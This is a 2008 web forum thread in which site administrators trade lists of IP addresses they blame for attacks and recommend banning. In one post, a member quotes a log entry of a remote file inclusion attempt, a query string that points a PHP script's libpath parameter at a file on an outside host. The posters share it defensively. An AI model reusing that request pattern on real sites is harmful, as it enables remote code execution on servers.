Title: IPs Causing Security Issues
Post by: Cobra {sfx} on July 28, 2008, 05:57:40 PM
Post by: Cobra {sfx} on July 28, 2008, 05:57:40 PM
I check the site log regular and thought i would post a list of IPs i find that are trying to redirect/cause security issues etc, you might want to add this list to your own sites ban list. duplicates are obviously repeat offenders as this list is only from this week and is not all of them, some may be from sites that allow fake ips to be used (which should be banned for obvious reasons anyway), perhaps a listing like this will deter future assholes. This list will be added to!
213.219.217.44
201.130.79.130
70.84.182.98
81.9.63.18
85.17.137.5
81.198.180.10
65.98.67.106
208.68.3.10
75.125.201.18
209.172.55.13
217.20.175.69
89.16.174.48
91.121.25.139
82.165.177.172
98.129.33.59
207.210.115.114
67.205.68.170
79.171.18.36
212.69.218.36
62.112.193.46
85.214.120.115
72.47.193.84
85.214.120.115
74.55.113.226
64.72.122.120
89.107.66.215
80.248.212.73
63.247.129.200
64.119.186.52
116.127.123.13
74.53.106.146
72.95.137.5
212.69.204.75
209.51.219.170
64.26.63.17
89.111.179.12
77.222.40.12
199.237.232.25
216.246.53.83
64.38.20.210
72.9.145.107
77.79.25.248
75.125.40.130
216.206.238.35
190.2.55.34
59.106.19.213
195.70.36.107
210.245.87.117
216.40.222.226
79.171.18.36
201.94.229.85
222.122.161.107
75.127.70.16
200.170.189.193
67.15.186.5
74.53.240.146
216.199.200.75
205.234.198.225
200.48.189.45
75.0.18.81
194.85.89.114
77.232.68.10
209.200.229.130
89.111.176.106
87.106.65.144
85.119.244.16
205.234.130.171
207.44.230.33
62.22.69.36
121.97.51.4
222.73.48.200
89.111.173.117
216.246.31.225
89.31.24.64
202.130.125.73
82.194.66.40
62.149.12.122
93.80.179.67
87.242.99.137
91.121.4.136
72.232.71.106
213.219.217.44
201.130.79.130
70.84.182.98
81.9.63.18
85.17.137.5
81.198.180.10
65.98.67.106
208.68.3.10
75.125.201.18
209.172.55.13
217.20.175.69
89.16.174.48
91.121.25.139
82.165.177.172
98.129.33.59
207.210.115.114
67.205.68.170
79.171.18.36
212.69.218.36
62.112.193.46
85.214.120.115
72.47.193.84
85.214.120.115
74.55.113.226
64.72.122.120
89.107.66.215
80.248.212.73
63.247.129.200
64.119.186.52
116.127.123.13
74.53.106.146
72.95.137.5
212.69.204.75
209.51.219.170
64.26.63.17
89.111.179.12
77.222.40.12
199.237.232.25
216.246.53.83
64.38.20.210
72.9.145.107
77.79.25.248
75.125.40.130
216.206.238.35
190.2.55.34
59.106.19.213
195.70.36.107
210.245.87.117
216.40.222.226
79.171.18.36
201.94.229.85
222.122.161.107
75.127.70.16
200.170.189.193
67.15.186.5
74.53.240.146
216.199.200.75
205.234.198.225
200.48.189.45
75.0.18.81
194.85.89.114
77.232.68.10
209.200.229.130
89.111.176.106
87.106.65.144
85.119.244.16
205.234.130.171
207.44.230.33
62.22.69.36
121.97.51.4
222.73.48.200
89.111.173.117
216.246.31.225
89.31.24.64
202.130.125.73
82.194.66.40
62.149.12.122
93.80.179.67
87.242.99.137
91.121.4.136
72.232.71.106
Title: IPs Causing Security Issues
Post by: JoeyC on July 29, 2008, 12:30:03 AM
Post by: JoeyC on July 29, 2008, 12:30:03 AM
Alot of ip's there, may or may not be the ip of the actual people though. They could be using a bot from a remote server somewhere. Someone keeps trying to get into my site with this crap lol
Query String: www.3dsthehaven.com/modules.php?name=SQuery/SQuery/lib/gore.php?libpath=http://www.xn--plttlnd-6wad.de//wp-content/plugins/id.txt???
Forwarded For: none
Client IP: none
Remote Address: 80.67.21.95
Remote Port: 52516
Request Method: GET
Country: Unknown
Title: IPs Causing Security Issues
Post by: Cobra {sfx} on July 29, 2008, 01:52:13 AM
Post by: Cobra {sfx} on July 29, 2008, 01:52:13 AM
Whatever theyre using - isnt a bad idea to ban the IPS as i meant above - if theyre obtainable for naughty purposes then theyre up to no good.
You think thats a lot you should see the sites log, most are of the type your getting.
You think thats a lot you should see the sites log, most are of the type your getting.
Title: IPs Causing Security Issues
Post by: JoeyC on July 29, 2008, 02:13:01 AM
Post by: JoeyC on July 29, 2008, 02:13:01 AM
It definitely is a good idea to ban them m8 since it is banning the remote ip that it is coming from. Just wish their was a way to find out who is actually behind it. Dirty hackers should get what is coming to them 